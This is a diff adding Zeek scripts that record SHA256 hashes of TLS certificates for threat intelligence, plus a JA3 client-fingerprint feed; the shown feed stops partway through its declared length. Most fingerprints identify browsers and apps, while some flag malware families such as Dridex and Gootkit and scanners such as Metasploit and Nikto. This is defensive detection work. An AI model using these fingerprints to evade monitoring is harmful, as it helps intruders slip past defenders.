--- a/capitalone/frameworks/intel/load.zeek
+++ b/capitalone/frameworks/intel/load.zeek
@ -0,0 +1,7 @@
+#
+# Copyright (c) 2017 Capital One. All rights reserved.
+# Author: Derek Ditch <derek.ditch@criticalstack.com>
+#
+
+@load ./cert_sha256.zeek
+@load ./feeds.zeek
--- a/capitalone/frameworks/intel/cert_sha256.zeek
+++ b/capitalone/frameworks/intel/cert_sha256.zeek
@ -0,0 +1,49 @@
+#
+# Copyright (c) 2016-2018 RockNSM.
+#
+# This file is part of RockNSM
+# (see http://rocknsm.io).
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+@load frameworks/intel/seen
+
+# Ensure we SHA256 all the things, but especially the x509 certs
+event file_new(f: fa_file)
+{
+        Files::add_analyzer(f, Files::ANALYZER_SHA256);
+}
+
+# Observe x509 SHA256 hashes
+event file_hash(f: fa_file, kind: string, hash: string)
+{
+        if ( ! f?$info || ! f$info?$x509 || kind != "sha256" )
+                return;
+
+        Intel::seen([$indicator=hash,
+                     $indicator_type=Intel::CERT_HASH,
+                     $f=f,
+                     $where=X509::IN_CERT]);
+}
+
+event x509_certificate(f: fa_file, cert_ref: opaque of x509, cert: X509::Certificate)
+{
+        # if the file_hash event was raised before the x509 event...
+        if ( f$info?$sha256 ) {
+                Intel::seen([$indicator=f$info$sha256,
+                             $indicator_type=Intel::CERT_HASH,
+                             $f=f,
+                             $where=X509::IN_CERT]);
+        }
+}
--- a/capitalone/frameworks/intel/feeds.zeek
+++ b/capitalone/frameworks/intel/feeds.zeek
@ -0,0 +1,9 @@
+
+@load base/frameworks/intel
+@load frameworks/intel/seen
+@load frameworks/intel/do_notice
+
+redef Intel::read_files += {
+    @DIR + "/feeds/symantec-bad-issuers.dat",
+    @DIR + "/feeds/ja3.intel"
+};
--- a/capitalone/frameworks/intel/feeds/ja3.intel
+++ b/capitalone/frameworks/intel/feeds/ja3.intel
@ -0,0 +1,713 @@
+#fields	indicator	indicator_type	meta.source	meta.desc	meta.do_notice	meta.if_in
+93948924e733e9df15a3bb44404cd909	Intel::JA3	ja3	Adium 1.5.10 (a)	F	-
+e4adf57bf4a7a2dc08e9495f1b05c0ea	Intel::JA3	ja3	Adium 1.5.10 (b)	F	-
+d5169d6e19447685bf6f1af8c055d94d	Intel::JA3	ja3	AirCanada Android App	F	-
+0bb402a703d08a608bf82763b1b63313	Intel::JA3	ja3	AirCanada Android App	F	-
+662fdc668dd6af994a0f903dbcf25d66	Intel::JA3	ja3	Android App	F	-
+515601c4141e718865697050a7a1765f	Intel::JA3	ja3	Android Google API Access	F	-
+855953256ecc8e2b6d2360aff8e5d337	Intel::JA3	ja3	Android Webkit Thing	F	-
+99d8afeec9a4422120336ad720a5d692	Intel::JA3	ja3	Android Webkit Thing	F	-
+85bb8aa8e5ba373906348831bdbed41a	Intel::JA3	ja3	Android Webkit Thing	F	-
+1aab4c2c84b6979c707ed052f724734b	Intel::JA3	ja3	Android Webkit Thing	F	-
+5331a12866e19199b363f6e903381498	Intel::JA3	ja3	Android Webkit Thing	F	-
+25b72c88f837567856118febcca761e0	Intel::JA3	ja3	Android Webkit Thing	F	-
+d4693422c5ce1565377aca25940ad80c	Intel::JA3	ja3	Apple Push Notification System	F	-
+3e404f1e1b5a79e614d7543a79f3a1da	Intel::JA3	ja3	Apple Spotlight Search (OSX)	F	-
+69b2859aec70e8934229873fe53902fd	Intel::JA3	ja3	Apple Spotlight	F	-
+6b9b64bbe95ea112d02c8812fc2e7ef0	Intel::JA3	ja3	Apple Spotlight	F	-
+e5e4c0eeb02fdcf30af8235b4de07780	Intel::JA3	ja3	Apple Spotlight	F	-
+97827640b0c15c83379b7d71a3c2c5b4	Intel::JA3	ja3	Apple SpotlightNetHelper (OSX)	F	-
+47e42b00af27b87721e526ff85fd2310	Intel::JA3	ja3	Apple usbmuxd iOS socket multiplexer	F	-
+b677934e592ece9e09805bf36cd68d8a	Intel::JA3	ja3	AppleWebKit/533.1 (KHTML like Gecko) Version/4.0 Mobile Safari/533.1	F	-
+1a6ef47ab8325fbb42c447048cea9167	Intel::JA3	ja3	AppleWebKit/533.1 (KHTML like Gecko) Version/4.0 Mobile Safari/533.1	F	-
+ef323f542a99ab12d6b5348bf039b7b4	Intel::JA3	ja3	AppleWebKit/534.30 (KHTML like Gecko) Version/4.0 Safari & Safari Mobile/534.30	F	-
+e1e03b911a28815836d79c5cdd900a20	Intel::JA3	ja3	AppleWebKit/534.30	F	-
+ef323f542a99ab12d6b5348bf039b7b4	Intel::JA3	ja3	AppleWebKit/534.30	F	-
+04e1f90d8719caabafb76d4a7b13c984	Intel::JA3	ja3	AppleWebKit/534.46 Mobile/9A334	F	-
+dc08cf4510f70bf16d4106ee22f89197	Intel::JA3	ja3	AppleWebKit/534.46	F	-
+4049550d5f57eae67d958440bdc133e4	Intel::JA3	ja3	AppleWebKit/535 & Ubuntu Product Search	F	-
+ef75a13be2ed7a82f16eefe6e84bc375	Intel::JA3	ja3	AppleWebKit/600.7.12 or 600.1.4	F	-
+eaa8a172289b09a6789a415d1faac4c9	Intel::JA3	ja3	AppleWebKit/600.7.12	F	-
+1c8a17e58c20b49e3786fc61e0533e50	Intel::JA3	ja3	Atlassian SourceTree (Tested v1.6.21.0)	F	-
+42215ee83bbf3a857a72ef42213cfbd6	Intel::JA3	ja3	Atlassian SourceTree (git library?) (Tested v1.6.21.0)	F	-
+58360f4f663a0f5657f415ac2f47fe1b	Intel::JA3	ja3	Aviator (Mystery 3rd) (37.0.2062.99) (OS X)	F	-
+5149f53b5554a31116f9d86237552ee3	Intel::JA3	ja3	Aviator Updates	F	-
+add211c763889c665ae4ab675165cbc4	Intel::JA3	ja3	BlackBerry Browser (Tested BB10)	F	-
+a921515f014005af03fc1e2c4c9e66ce	Intel::JA3	ja3	BlackBerry Mail Client	F	-
+4692263d4130929ae222ef50816527ca	Intel::JA3	ja3	Blackberry Messenger (Android) 2	F	-
+b5d42ca0e68a39d5c0a294134a21f020	Intel::JA3	ja3	Blackberry	F	-
+32b0ae286d1612c82cad93b4880ee512	Intel::JA3	ja3	Blackbery Messenger (Android)	F	-
+01aead19a1b1780978f732e056b183a6	Intel::JA3	ja3	BrowserShots Script	F	-
+a4dc1c39a68bffec1cc7767472ac85a8	Intel::JA3	ja3	Browsershots	F	-
+c3ca411515180e79c765dc2c3c8cea88	Intel::JA3	ja3	BurpSuite Free (1.6.01)	F	-
+93fbcdadc1bf98ff0e3c03e7f921edd1	Intel::JA3	ja3	BurpSuite Free (1.6.01)	F	-
+34f8cac266d07bfc6bd3966e99b54d00	Intel::JA3	ja3	BurpSuite Free (tested: 1.6.32 Kali)	F	-
+15617351d807aa3145547d0ad0c976cc	Intel::JA3	ja3	BurpSuite Free (tested: 1.6.32 Kali)	F	-
+17a40616b856ec472714cd144471e0e0	Intel::JA3	ja3	Candy Crush (testing iOS 8.3)	F	-
+64bb259b446fe13f66bcd62d1f0d33df	Intel::JA3	ja3	Choqok 1.5 (KDE 4.14.18 Qt 4.8.6 on OpenSUSE 42.1)	F	-
+d54a0979516e607a1166e6efd157301c	Intel::JA3	ja3	Chrome (Possible 41.x)	F	-
+ac67a2d0e3bd59459c32c996b5985979	Intel::JA3	ja3	Chrome (Tested: 47.0.2526.XX & 48.XX (64-bit)) #1	F	-
+34dfce2bb848da7c5dafa4d475f0ba41	Intel::JA3	ja3	Chrome (Tested: 47.0.2526.XX & 48.XX (64-bit)) #2	F	-
+937edefedb6fe13f26d1a425ef1c15a5	Intel::JA3	ja3	Chrome (Tested: 47.0.2526.XX & 48.XX (64-bit)) #3	F	-
+a342d14afad3a448029ec808295ccce9	Intel::JA3	ja3	Chrome (Tested: 47.0.2526.XX & 48.XX (64-bit)) #4	F	-
+71e74faaed87acd177bd3b47a543f476	Intel::JA3	ja3	Chrome (Tested: 47.0.2526.XX & 48.XX (64-bit)) #5	F	-
+bec8267042d5885aa3acc07b4409cafc	Intel::JA3	ja3	Chrome (iOS)	F	-
+1d64ab25ad6f7258581d43077147b9b1	Intel::JA3	ja3	Chrome (tested: Version 46.0.2490.86 (64-bit) - OS X)	F	-
+230018e44608686b64907360b6def678	Intel::JA3	ja3	Chrome (tested: Version 46.0.2490.86 (64-bit) - OS X)	F	-
+dea05e8c68dfeb28003f21d22efc0aba	Intel::JA3	ja3	Chrome (tested: Version 46.0.2490.86 (64-bit) - OS X)	F	-
+62351d5ea3cd4f21f697965b10a9bbbe	Intel::JA3	ja3	Chrome 10	F	-
+62351d5ea3cd4f21f697965b10a9bbbe	Intel::JA3	ja3	Chrome 10.0.648.82 (Chromium Portable 9.0)	F	-
+a9da823fe77cd3df081644249edbf395	Intel::JA3	ja3	Chrome 11 - 18	F	-
+a9da823fe77cd3df081644249edbf395	Intel::JA3	ja3	Chrome 11.0.696.16 - 18.0.1025.33  Chrome 11.0.696.16 (Chromium Portable 9.2)	F	-
+df4a50323dfcaf1789f72e4946a7be44	Intel::JA3	ja3	Chrome 19 - 20	F	-
+df4a50323dfcaf1789f72e4946a7be44	Intel::JA3	ja3	Chrome 19.0.1084.15 - 20.0.1132.57	F	-
+df4a50323dfcaf1789f72e4946a7be44	Intel::JA3	ja3	Chrome 21.0.1180.89	F	-
+3c8cb61208e191af38b1fbef4eacd502	Intel::JA3	ja3	Chrome 22.0.1201.0	F	-
+df4a50323dfcaf1789f72e4946a7be44	Intel::JA3	ja3	Chrome 22.0.1229.96 - 23.0.1271.64 Safari/537.11	F	-
+1ef061c02d85b7e2654e11a9959096f4	Intel::JA3	ja3	Chrome 24.0.1312.57 - 28.0.1500.72 Safari/537.36	F	-
+89d37026246d4888e78e69af4f8d1147	Intel::JA3	ja3	Chrome 26.0.1410.43-27.0.1453.110 Safari/537.31	F	-
+206ee819879457f7536d2614695a5029	Intel::JA3	ja3	Chrome 29.0.1547.0	F	-
+bbc3992faa92affc0d835717ea557e99	Intel::JA3	ja3	Chrome 29.0.1547.62	F	-
+76d36fc79db002baa1b5e741fcd863bb	Intel::JA3	ja3	Chrome 29.0.1547.62	F	-
+dc3eaee99a9221345698f8a8b2f4fc3f	Intel::JA3	ja3	Chrome 30.0.0.0	F	-
+53c7ed581cbaf36951559878fcec4559	Intel::JA3	ja3	Chrome 30.0.1599.101	F	-
+fb8a6d2441ee9eaee8b560d48a8f59df	Intel::JA3	ja3	Chrome 31.0.1650.57 & 32.0.1700.76 Safari/537.36	F	-
+f7c4dc1d9595c27369a183a5df9f7b52	Intel::JA3	ja3	Chrome 31.0.1650.63	F	-
+16d7ebc398d772ef9969d2ed2a15f4c0	Intel::JA3	ja3	Chrome 33.0.1750.117	F	-
+f3136cf565acf70dd2f98ca652f43780	Intel::JA3	ja3	Chrome 33.0.1750.117	F	-
+af0ae1083ab10ac957e394c2e7ec4634	Intel::JA3	ja3	Chrome 33.0.1750.154	F	-
+ef3364da4d76c98a669cb828f2e5283a	Intel::JA3	ja3	Chrome 34.0.1847.116 & 35.0.1916.114 Safari/537.36	F	-
+4807d61f519249470ebed0b633e707cf	Intel::JA3	ja3	Chrome 34.0.1847.116 & 35.0.1916.114 Safari/537.36	F	-
+5b348680dec77f585cfe82513213ac3a	Intel::JA3	ja3	Chrome 36.0.1985.125 & 37.0.2062.102 Safari/537.36	F	-
+52be6e88840d2211a243d9356550c4a5	Intel::JA3	ja3	Chrome 36.0.1985.125 - 40.0.2214.93 Safari/537.36	F	-
+5f775bbfc50459e900d464ca1cecd136	Intel::JA3	ja3	Chrome 37.0.0.0 Safari & Mobile Safari/537.36	F	-
+a167568462b993d5787488ece82a439a	Intel::JA3	ja3	Chrome 37.0.0.0	F	-
+98652faa7e0a4d85f91e37aa6b8c0135	Intel::JA3	ja3	Chrome 37.0.2062.120	F	-
+8b8322bad90e8bfbd66e664839b7a037	Intel::JA3	ja3	Chrome 41.0.2272.89	F	-
+aa9074aa1ff31c65d01c35b9764762b6	Intel::JA3	ja3	Chrome 42.0.2311.135	F	-
+de0963bc1f3a0f70096232b272774025	Intel::JA3	ja3	Chrome 42.0.2311.135	F	-
+3bb36ec17fef5d3da04ceeb6287314c6	Intel::JA3	ja3	Chrome 43.0.2357.132 & 45.02454.94	F	-
+cd3f72760dfd5575b91213a8016c596b	Intel::JA3	ja3	Chrome 48.0.2564.116	F	-
+5406c4a87aa6cbcb7fc469fee526a206	Intel::JA3	ja3	Chrome 48.0.2564.97	F	-
+503fe06db7ef09b2cbd771c4e784c686	Intel::JA3	ja3	Chrome 49.0.2623.75	F	-
+bd4267e1672f9df843ada7c963490a0d	Intel::JA3	ja3	Chrome 50.0.2661.102 1	F	-
+caeb3b546fc7469776d51f1f54a792ca	Intel::JA3	ja3	Chrome 50.0.2661.102 2	F	-
+aa84deda2a937ad225ef94161887b0cb	Intel::JA3	ja3	Chrome 51.0.2704.106 (test)	F	-
+473e8bad0e8e1572197be80faa1795c3	Intel::JA3	ja3	Chrome 51.0.2704.84 1	F	-
+e0b0e6c934c686fd18a5727648b3ed4f	Intel::JA3	ja3	Chrome 51.0.2704.84 2	F	-
+7ddfe8d6f8b51a90d10ab3fe2587c581	Intel::JA3	ja3	Chrome 51.0.2704.84 3	F	-
+bc76a4185cc9bd4c72471620e552618c	Intel::JA3	ja3	Chrome 51.0.2704.84 4	F	-
+8e3eea71cb5a932031d90cc0fba581bc	Intel::JA3	ja3	Chrome 51.0.2704.84 5	F	-
+653924bcb1d6fd09a048a4978574e2c5	Intel::JA3	ja3	Chrome 51.0.2704.84 6	F	-
+1ef652ecfb8e60e771a4710166afc262	Intel::JA3	ja3	Chrome 51.0.2704.84 7	F	-
+cafd1f84716def1a414c688943b99faf	Intel::JA3	ja3	Chrome WebSockets (48.xxxx) - also TextSecure Desktop	F	-
+62d8823f52dd8e1ba75a9a83e8748313	Intel::JA3	ja3	Chrome WebSockets (48.xxxx)	F	-
+3c8cb61208e191af38b1fbef4eacd502	Intel::JA3	ja3	Chrome/22.0.1229.96	F	-
+c405bbbe31c0e53ac4c8448355b2af5b	Intel::JA3	ja3	Chrome/30.0.1599.101	F	-
+2c3221f495d5e4debbb34935e1717703	Intel::JA3	ja3	Chrome/41.0.2272.89	F	-
+7f340e6caa1fa4c979df919227160ff6	Intel::JA3	ja3	Cisco AnyConnect Secure Mobility Client (3.1.09013)	F	-
+203157ed9f587f0cfd265061bf309823	Intel::JA3	ja3	Citrix Receiver 4.4.0.8014	F	-
+f865de0807a17e9cb797e618162356db	Intel::JA3	ja3	Customised Postfix - Damnit Matt	F	-
+653d342bee5001569662198a672746af	Intel::JA3	ja3	DropBox (tested: 3.12.5 - Ubuntu 14.04TS & Win 10)	F	-
+482a11a20da1629b77aaadf640478d13	Intel::JA3	ja3	Dropbox (Win 8.1)	F	-
+ede63467191e9a12300e252c41ca9004	Intel::JA3	ja3	Dropbox (installer?)	F	-
+2f8363419a9fb80ad46b380778d8eaf1	Intel::JA3	ja3	Dropbox Setup (tested: 3.10.11 on Win 8.x)	F	-
+c1e8322501b4d56d484b50bd7273e798	Intel::JA3	ja3	Dropbox Splash Pages (Win 10)	F	-
+6c141f98cd79d8b505123e555c1c3119	Intel::JA3	ja3	Dropbox Windows	F	-
+36bc8c7e10647bbfea3f740e7f05c0f1	Intel::JA3	ja3	Dropbox	F	-
+576a1288426703ae0008c42f95499690	Intel::JA3	ja3	Facebook iOS	F	-
+2872afed8370401ec6fe92acb53e5301	Intel::JA3	ja3	FireFox 40.0.3 (tested Windows 8)	F	-
+1996e434b11323df4e87f8fe0e702209	Intel::JA3	ja3	FireFox 49 (TLSv1.3 enabled - I think websockets)	F	-
+8ed0a2cdcad81fc29313910eb94941d8	Intel::JA3	ja3	FireFox 49 (TLSv1.3 enabled)	F	-
+f586111542f330901d9a3885a9c821b5	Intel::JA3	ja3	FireFox 49 (dev edition)	F	-
+3d99dda4f6992b35fdb16d7ce1b6ccba	Intel::JA3	ja3	Firefox 24.0 Iceweasel24.3.0	F	-
+c57914fadb301a73e712378023b4b177	Intel::JA3	ja3	Firefox 25.0	F	-
+755cdaa3496eb8728247a639dee17aad	Intel::JA3	ja3	Firefox 26.0	F	-
+ff9223b5c9a5d44a8a423833751fa158	Intel::JA3	ja3	Firefox 27.0	F	-
+df9bedd5713fe0cc2e9184d7c16a5913	Intel::JA3	ja3	Firefox 3.0.19	F	-
+4a9bd55341e1ffe6fedb06ad4d3010a0	Intel::JA3	ja3	Firefox 3.5 - 3.6	F	-
+4a9bd55341e1ffe6fedb06ad4d3010a0	Intel::JA3	ja3	Firefox 3.5.19  3.6.27  SeaMonkey 2.0.14	F	-
+46129449560e5731dc9c5106f111a3db	Intel::JA3	ja3	Firefox 46.0	F	-
+d06b3234356cb3df0983fc8dd02ece68	Intel::JA3	ja3	Firefox 46.0	F	-
+05ece02fb23acf2efbfff54ce4099a45	Intel::JA3	ja3	Firefox 47.0 2	F	-
+aa907c2c4720b6f54cd8b67a14cef0a3	Intel::JA3	ja3	Firefox 47.x 1 / FireFox 47.x (Windows 7SP1)	F	-
+8b18c5b0c54cba1ffb2438fe24792b63	Intel::JA3	ja3	Firefox 49.0a2 Developer TLS 1.3 enabled	F	-
+55f2bd38d462d74fb6bb72d3630aae16	Intel::JA3	ja3	Firefox/10.0.11esrpre Iceape/2.7.12	F	-
+85c420ab089dac5025034444789a8fb5	Intel::JA3	ja3	Firefox/13.0-25.0	F	-
+e98db583389531a37f2fe8d251f0f7ae	Intel::JA3	ja3	Firefox/25.0	F	-
+755cdaa3496eb8728247a639dee17aad	Intel::JA3	ja3	Firefox/26.0	F	-
+cc9bcf019b339c01d200515d1cb39092	Intel::JA3	ja3	Firefox/27.0-32.0	F	-
+45d22e6403f053bfb2cc223755588533	Intel::JA3	ja3	Firefox/28.0-30.0	F	-
+8df37d4e7430e2d9a291ae9ee500a1a9	Intel::JA3	ja3	Firefox/32.0	F	-
+c5392af25feaf95cfefe858abd01c86b	Intel::JA3	ja3	Firefox/33.0	F	-
+5ba6ed04b246c96c6839e0268a8b826f	Intel::JA3	ja3	Firefox/33.0	F	-
+ab834ac5135f2204d473878821979cea	Intel::JA3	ja3	Firefox/34.0-35.00	F	-
+9250f97ba65d86e7b0e60164c820d91a	Intel::JA3	ja3	Firefox/34.0-35.00	F	-
+2872afed8370401ec6fe92acb53e5301	Intel::JA3	ja3	Firefox/37.0	F	-
+514058a66606ae870bcc670e95ca7e68	Intel::JA3	ja3	Firefox/37.0	F	-
+2aef69b4ba1938c3a400de4188743185	Intel::JA3	ja3	Firefox/6.0.1 - 12.0	F	-
+ca0f3f4c08cbd372720beb1af7d2721f	Intel::JA3	ja3	Firefox/52	F	-
+504ecb2d3e5e83a179316f098dadbaeb	Intel::JA3	ja3	Flux	F	-
+a6090977601dc1345948f101e46d5759	Intel::JA3	ja3	FullTilt Poker v16.5 (OS X) #1	F	-
+f1b9f86645cb839bd6992e848d943898	Intel::JA3	ja3	FullTilt Poker v16.5 (OS X) or DropBox	F	-
+a3b2fe29619fdcb7a9422b8fddb37a67	Intel::JA3	ja3	GMail SMTP Relay	F	-
+94b94048a438e77122fc4eee3a6a4a26	Intel::JA3	ja3	GNU Wget 1.16.1 built on darwin14.0.0	F	-
+0267b752d6a8b5fd195096b41ea5839c	Intel::JA3	ja3	GNUTLS Commandline	F	-
+d0df7f7c9ca173059b2cd17ce5c2e5cc	Intel::JA3	ja3	Git-Bash (Tested v2.6.0) / curl 7.47.1 (cygwin)	F	-
+f8c50bbee59c526ca66da05f3dc4b735	Intel::JA3	ja3	GitHub Desktop (tested build 216 on OSX)	F	-
+c5cbafbbcf53dfbfc2a803ca3833fce2	Intel::JA3	ja3	Glympse Location Tracking??	F	-
+07ef3a7f5f8ffef08affb186284f2af4	Intel::JA3	ja3	Google Calendar Agent (Tested on OSX)	F	-
+abe568de919448adcd756aea9a136aea	Intel::JA3	ja3	Google Chrome (43.0.2357.130 64-bit OSX)	F	-
+400961c8161ba7661a7029d3f7e8bb95	Intel::JA3	ja3	Google Chrome (Android)	F	-
+072c0469aa4f2f597bb38bcc17095c51	Intel::JA3	ja3	Google Chrome (tested: 43.0.2357.130 64-bit OSX)	F	-
+c40b51e2a59425b6a2b500d569962a60	Intel::JA3	ja3	Google Chrome (tested: 43.0.2357.130 64-bit OSX)	F	-
+696cd0c8c241e19e3d6336c3d3d9e2e0	Intel::JA3	ja3	Google Chrome (tested: 43.0.2357.130 64-bit OSX)	F	-
+e8aabc4fe1fc8d47c648d37b2df7485f	Intel::JA3	ja3	Google Chrome 45.0.2454.101	F	-
+514058a66606ae870bcc670e95ca7e68	Intel::JA3	ja3	Google Chrome 45.0.2454.85 or FireFox 41-42	F	-
+7ea3e17d09294aee8425ae05588f0c66	Intel::JA3	ja3	Google Chrome 46.0.2490.71 m	F	-
+a9030ea4837810ce89fb8a3d39ca12ed	Intel::JA3	ja3	Google Chrome 46.0.2490.71	F	-
+c1741dd3d2eec548df0bcd89e08fa431	Intel::JA3	ja3	Google Drive (tested: 1.26.0707.2863 - Win 8.x & Win 10)	F	-
+b16614e71d26ba348c94bfc8e33b1767	Intel::JA3	ja3	Google Earth Linux 7.1.4.1529	F	-
+9af622c65a17a0bf90d6e9504be96a43	Intel::JA3	ja3	Google Mail server starttls connection	F	-
+50dfee94717e9640b1c384e5bd78e61e	Intel::JA3	ja3	GoogleBot	F	-
+e76ac6872939f6ebfdf75f1ea73b4daf	Intel::JA3	ja3	Great Firewall of China Probe (via pcaps from https://nymity.ch/active-probing/)	F	-
+d9b07b9095590f4ff910ceee7b6af88a	Intel::JA3	ja3	HipChat	F	-
+78273d33877a36c0c30e3fb7578ee9e7	Intel::JA3	ja3	IE 11	F	-
+4cafc7a0acf83a49317ca199b2f25c82	Intel::JA3	ja3	IE 11	F	-
+cc9bcf019b339c01d200515d1cb39092	Intel::JA3	ja3	IceWeasel 31.8.0	F	-
+a61299f9b501adcf680b9275d79d4ac6	Intel::JA3	ja3	In all the malware samples - Java updater perhaps	F	-
+a6776199188c09f5124b46b895772fa2	Intel::JA3	ja3	Internet Explorer 11 .0.9600.1731.(Win 8.1)	F	-
+a264c0bb146b2fade4410bcd61744b69	Intel::JA3	ja3	Internet Explorer 11.0.9600.17959	F	-
+d54b3eb800cbeccf99fd5d5cdcd7b5b5	Intel::JA3	ja3	Internet Explorer 11.0.9600.18349 / TeamViewer 10.0.47484P / Notepad++ Update Check / Softperfect Network Scanner Update Check / Wireshark 2.0.4 Update Check	F	-
+2db6873021f2a95daa7de0d93a1d1bf2	Intel::JA3	ja3	Java 8U91 Update Check	F	-
+ced7418dee422dd70d2a6f42bb042432	Intel::JA3	ja3	K9 Mail (Android)	F	-
+8194818a46f5533268472f2167ffec70	Intel::JA3	ja3	Konqueror 4.14.18 (openSUSE Leap 42.1) 2	F	-
+78253eb48a1431a4bbbe6bb4358464ac	Intel::JA3	ja3	Konqueror 4.14.18 / Kmail 4.14.18 (openSUSE Leap 42.1) 1	F	-
+0e0b798d0208ad365eec733b29da92a6	Intel::JA3	ja3	Konqueror 4.8	F	-
+8d2e46c9e2b1ee9b1503cab4905cb3e0	Intel::JA3	ja3	MS Edge	F	-
+f66b0314f269695fe3528ef39a27c158	Intel::JA3	ja3	MS Office Components	F	-
+2201d8e006f8f005a6b415f61e677532	Intel::JA3	ja3	MSIE 10.0 Trident/6.0	F	-
+7b3b37883b5e80065b35f27888ed2b04	Intel::JA3	ja3	MSIE 10.0 Trident/6.0)	F	-
+2baf01616e930d378df97576e2686df3	Intel::JA3	ja3	MSIE 8.0 & 9.0 Trident/5.0)	F	-
+0cbbafcdaf63cbf1e490c4a2d903f24b	Intel::JA3	ja3	Mail app iOS	F	-
+67f762b0ffe3aad00dfdb0e4b1acd8b5	Intel::JA3	ja3	Malware: Dridex	F	-
+a34e8a810b5f390fc7aa5ed711fa6993	Intel::JA3	ja3	Malware: Gootkit	F	-
+c6e36d272db78ba559429e3d845606d1	Intel::JA3	ja3	Malware: Gootkit	F	-
+b50f81ae37fb467713e167137cf14540	Intel::JA3	ja3	Malware: TBot / Skynet Tor Botnet	F	-
+b9103d9d134e0c59cafbe4ae0a8299a8	Intel::JA3	ja3	Malware: Unknown traffic associated with Dridex	F	-
+84a315236aceb31ad56f5647dc64f793	Intel::JA3	ja3	Malware: https://www.virustotal.com/en/file/802d683b596d7ce7ae373b15fa4a8e8c2a237bd15bc8ef655fbd2c41239fa2c8/analysis/1433178940/	F	-
+73fab4ba757fdd5aac4729eb20f07c04	Intel::JA3	ja3	Malware: https://www.virustotal.com/file/07853289247c4c932ddfbf4c215b4e86240fab6661a6d6a85ac8ee37fe92b9be/analysis/1433596684/o	F	-
+4954bf2b5e6592b390a89d3b1dbe550a	Intel::JA3	ja3	Malware: https://www.virustotal.com/file/bbb3fbd2e8289d04733f8f005dc6410b050bee193a12ddf2f819141834e9c8fa/analysis/1433054369/	F	-
+45c2897e06c4979bd3b8e512523590d7	Intel::JA3	ja3	Malware: https://www.virustotal.com/file/bbb3fbd2e8289d04733f8f005dc6410b050bee193a12ddf2f819141834e9c8fa/analysis/1433054369/o	F	-
+fc5574de96793b73355ca9e555748225	Intel::JA3	ja3	Marble (KDE 5.21.0 QT 5.5.1 openSUSE Leap 42.1)	F	-
+cfaa6f79904b33fdca83dbb5d4b537d4	Intel::JA3	ja3	May Be Superfish	F	-
+1b5a75e6d0f679aa312edb060ea8d932	Intel::JA3	ja3	May Be Superfish	F	-
+16f17c896273d1d098314a02e87dd4cb	Intel::JA3	ja3	Metaploit http scanner (tested: 4.11.5 Kali)	F	-
+950ccdd64d360a7b24c70678ac116a44	Intel::JA3	ja3	Metasploit CCS Scanner	F	-
+ee031b874122d97ab269e0d8740be31a	Intel::JA3	ja3	Metasploit HeartBleed Scanner	F	-
+6825b330bf9de50ccc8745553cb61b2f	Intel::JA3	ja3	Metasploit SSL Scanner	F	-
+bff2c7b5c666331bfe9afacefd1bdb51	Intel::JA3	ja3	Microsoft Updater (Windows 7SP1) / TeamViewer 11.0.56083P	F	-
+48cf5fb702315efbfc88ee3c8c94c6cb	Intel::JA3	ja3	Microsoft Windows Socket (Tested: Windows 10)	F	-
+d65ddade944f9acfe4052b2c9435eb85	Intel::JA3	ja3	Mozilla Sync Services (Android)	F	-
+c2116e5bb14394aafbefe12ade9bd8ab	Intel::JA3	ja3	Mozilla Thunderbird (tested: 31.5.0)	F	-
+6fd163150b060dd7d07add280f42f4ed	Intel::JA3	ja3	Mozilla Thunderbird (tested: 38.3.0)	F	-
+de350869b8c85de67a350c8d186f11e6	Intel::JA3	ja3	Mozilla/4.0 (compatible; MSIE 6.0 or MSIE 7.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)	F	-
+4025f224557638ee81afc4f272fd7577	Intel::JA3	ja3	NVIDEA GeForce Experience	F	-
+146c6a6537ba4cc22d874bf8ff346144	Intel::JA3	ja3	NetFlix App on AppleTV (possibly others also)	F	-
+f4262963691a8f123d4434c7308ad7fe	Intel::JA3	ja3	Nikto (tested 2.1.6 - Kali)	F	-
+5eeeafdbc41e5ca7b81c92dbefa03ab7	Intel::JA3	ja3	Nikto (tested 2.1.6 - Kali)	F	-
+a563bb123396e545f5704a9a2d16bcb0	Intel::JA3	ja3	Nikto (tested v2.1.6)	F	-
+1d095e68489d3c535297cd8dffb06cb9	Intel::JA3	ja3	Non-Specific Microsoft Socket	F	-
+43bb6a18756587426681e4964e5ea4bf	Intel::JA3	ja3	OS X WebSockets	F	-
+a35c1457421bcfaf5edaccb910bfea1d	Intel::JA3	ja3	OpenConnect version v7.01	F	-
+07aa6d7cac645c8845d6e96503f7d985	Intel::JA3	ja3	OpenConnect version v7.06 / wget 1.17.1-1 (cygwin)	F	-
+0e0b798d0208ad365eec733b29da92a6	Intel::JA3	ja3	OpenSSL s_client (tested: 1.0.1f - Ubuntu 14.04TS)	F	-
+4e6f7f036fb2b05a50ee8a686b1176a6	Intel::JA3	ja3	Opera 10.53  10.60  11.61  11.64  12.02	F	-
+ceee08c3603b53be80c8afdc98babdd6	Intel::JA3	ja3	Opera 11.11  11.52	F	-
+561271bdcbfe68504ce78b38c957eef0	Intel::JA3	ja3	Opera 12.14 - 12.16	F	-
+8b475d6105c72827a234fbd47e25b0a3	Intel::JA3	ja3	Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.6.30 Version/10.60	F	-
+44f37c3ceccb551271bfe0ba6d39426c	Intel::JA3	ja3	Opera/9.80 Presto/2.10.229 Version/11.62	F	-
+a16170ff03466c8ee703dd71feda9bfe	Intel::JA3	ja3	Opera/9.80 Presto/2.10.289 & Presto/2.10.229	F	-
+b237ac4bcc16c142168df03a871677bd	Intel::JA3	ja3	Opera/9.80 Presto/2.10.289 Version/12.00	F	-
+07715901e2c6fe4c45e7c42587847d5d	Intel::JA3	ja3	Opera/9.80 Presto/2.12.388	F	-
+329ff4616732b84de926caa7fd6777b0	Intel::JA3	ja3	Opera/9.80 Presto/2.12.388	F	-
+53eb89fe6147474039c1162e4d9d3dc0	Intel::JA3	ja3	Outlook 2007 (Win 8.1)	F	-
+b74f9ecf158e0575101c16c5265a85b0	Intel::JA3	ja3	Pidgin (tested 2.10.11)	F	-
+6ea7cfa450ce959818178b420f59fec4	Intel::JA3	ja3	Pocket/Slack/Duo (Android)	F	-
